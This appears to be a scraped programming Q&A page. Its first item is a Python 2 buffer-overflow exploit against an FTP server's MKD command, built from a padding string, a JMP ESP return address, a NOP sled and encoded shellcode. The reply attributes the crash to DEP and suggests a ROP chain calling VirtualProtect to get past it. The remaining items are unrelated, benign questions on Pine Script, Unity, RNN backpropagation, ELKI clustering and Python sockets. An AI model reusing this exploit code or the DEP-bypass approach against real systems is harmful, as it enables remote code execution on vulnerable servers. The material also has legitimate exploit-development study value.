Immunity debugger: access violation when executing - exploit

I am writing a simple exploit code use jmp to esp, but after go to esp at address 00B7FC2C Immunity show error: Access violation when executing [00B7FC2C]
here is my code:
#!/usr/bin/python2.7
import sys, os, socket
fuzz = "\x41" * 248
eip = "\x59\x54\xC3\x77"
nops = "\x90" * 8
shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80"
shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98"
shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7"
shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0"
shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82"
shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0"
shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6"
shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d"
shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32"
shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90"
shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5"
shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71"
shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2"
shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f"
shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14"
shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec"
shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88"
shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79"
command = "MKD"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('10.0.0.2',21))
print "\n" + s.recv(1024)
s.send('USER anonymous\r\n')
print "\n" + s.recv(1024)
s.send('PASS \r\n')
print "\n" + s.recv(1024)
s.send(command + '' + fuzz + nops + shellcode + '\r\n')
print "\n" + s.recv(1024)
s.send('QUIT\r\n')
s.close()

As you didn't include the opcode at the address or registry values, I'll point to the most likely explanation. It would appear that the process you are exploiting takes advatange of Data Execution Protection (DEP) to prevent data on the stack executing as code. The trick to executing your shellcode under DEP is to use Return Oriented Programming (ROP) to call VirtualProtect() or a similar function to disable DEP for the memory area that holds your shellcode before returning control to your shellcode. You can find more information on bypassing DEP here: https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube

Related

'range' cannot be used as a variable or function name

the error is:
Compilation error. Line 13: 'range' cannot be used as a variable or
function name.
//#version=5
indicator('My Script')
// 计算振幅
range = high - low
// 定义信息框显示的内容
info = "开盘价: " + tostring(open) + "\n"
+ "最高价: " + tostring(high) + "\n"
+ "最低价: " + tostring(low) + "\n"
+ "振幅: " + tostring(range) + "\n"
+ "成交量: " + tostring(volume)
// 定义当鼠标悬停在当前k线时显示信息框
bgcolor(not nz(bgcolor[1]) and barstate.ishovered, color.new(color.red, 50))
// 当鼠标悬停在当前k线时,显示信息框
label.new(bar_index, high, text=info, xloc=xloc.bar_time, yloc=yloc.abovebar
Your code is full of error.
For the range problem, just change :
range = high - low
To :
myrange = high - low

Unity3D Stop counter

I made a script for a game that counts the playtime. So the question is how can i stop the script befor the game is over or for example save the time as a float.
// Für die SpielZeit
SpielZeit += Time.deltaTime;
// SpielZeitText = Spielzeit in einen String + "Sekunden"
SpielZeitText.text = " " + Mathf.Round(SpielZeit).ToString() + " " + "Sekunden";
// SpielZeitFuerEscape = Spielzeit in einen String + "Sekunden" (für den escape canvas)
SpielZeitFuerEscape.text = " " + Mathf.Round(SpielZeit).ToString() + " " + "Sekunden";
SpielZeit, SpielZeitText, and SpielZietFuerEscape should be put as members of the main class. Or you should set it accessible to anything which needs it.
Then put the counter in an Update function. (If you want to make a frame-by-frame update, include the .text setters there as well.) Enclose the counter with an if statement, which sees if you want to continue it, or if you want to stop it.
if(go_on) { //if the counter should keep going
// Für die SpielZeit
SpielZeit += Time.deltaTime;
// SpielZeitText = Spielzeit in einen String + "Sekunden"
SpielZeitText.text = " " + Mathf.Round(SpielZeit).ToString() + " " + "Sekunden";
// SpielZeitFuerEscape = Spielzeit in einen String + "Sekunden" (für den escape canvas)
SpielZeitFuerEscape.text = " " + Mathf.Round(SpielZeit).ToString() + " " + "Sekunden";
}
where go-on is a boolean, telling the code whether it should continue (true) or stop (false).

RNN backprop-through-time

I'm investigating RNNs and after read this paper, got the how Backrpop-through-time works on RNNs:
https://arxiv.org/pdf/1610.02583.pdf
But I have some confusion with the following implementation (from cs231):
for t in reversed(xrange(T)):
dh_current = dh[t] + dh_prev
dx_t, dh_prev, dWx_t, dWh_t, db_t = rnn_step_backward(dh_current, cache[t])
dx[t] += dx_t
dh0 = dh_prev
dWx += dWx_t
dWh += dWh_t
db += db_t
Why summing up dh[t] and dh_prev gradients, dh_current = dh[t] + dh_prev ?
Full source code: https://github.com/williamchan/cs231-assignment3/blob/master/cs231n/rnn_layers.py

How to see ELKI DBSCAN clustering result

I am using ELKI for DBSCAN clustering of some ~14,000 GPS points.Its running fine but I want to see information about clusters like how many points are in a cluster.?
If you use the -resulthandler ResultWriter and output to text, the cluster sizes will be at the top of each cluster file.
The visualizer currently doesn't seem to show cluster sizes.
If you use the -resulthandler ResultWriter and output to text, the cluster sizes will be at the top of each cluster file.
Also, if you want to merge all those results into a single file, here is a python script that works:
clusterout_path = "path/to/where/files/all/go/"
finalout_path = "/path/for/single/merged/file/"
consol_filename= "single_merged_file.txt"
cll_file = open(finalout_path + consol_filename,"a")
cll_file.write("ClusterID"+ "\t" + "Lon" + "\t" + "Lat" + "\n")
def readFile(file):
f = open(clusterout_path + file)
counter = 0
cluster = ""
lon = ""
lat = ""
for line in f.readlines():
counter+=1
if counter == 1:
cluster = line.split(":")[1].strip().lower()
if counter > 4 and line.startswith("ID"):
arr = line.split(" ")
lon = arr[1]
lat = arr[2]
cll_file.write(cluster + "\t" + lon + "\t" + lat + "\n")
f.close()
listing = os.listdir(clusterout_path)
for infile in listing:
print "Processing file: " + infile
readFile(infile)
cll_file.close()

using bytearray with socket.recv_into

I am doing some socket IO, and using a bytearray object as a buffer. I would like to receive data with an offset into this buffer using csock.recv_into as shown below in order to avoid creating intermediary string objects. Unfortunately, it seems bytearrays can't be used this way, and the code below doesn't work.
buf = bytearray(b" " * toread)
read = 0
while(toread):
nbytes = csock.recv_into(buf[read:],toread)
toread -= nbytes
read += nbytes
So instead I am using the code below, which does use a temporary string (and works)...
buf = bytearray(b" " * toread)
read = 0
while(toread):
tmp = csock.recv(toread)
nbytes = len(tmp)
buf[read:] = tmp
toread -= nbytes
read += nbytes
Is there a more elegant way to do this that doesn't require copying intermediate strings around?
Use a memoryview to wrap your bytearray:
buf = bytearray(toread)
view = memoryview(buf)
while toread:
nbytes = sock.recv_into(view, toread)
view = view[nbytes:] # slicing views is cheap
toread -= nbytes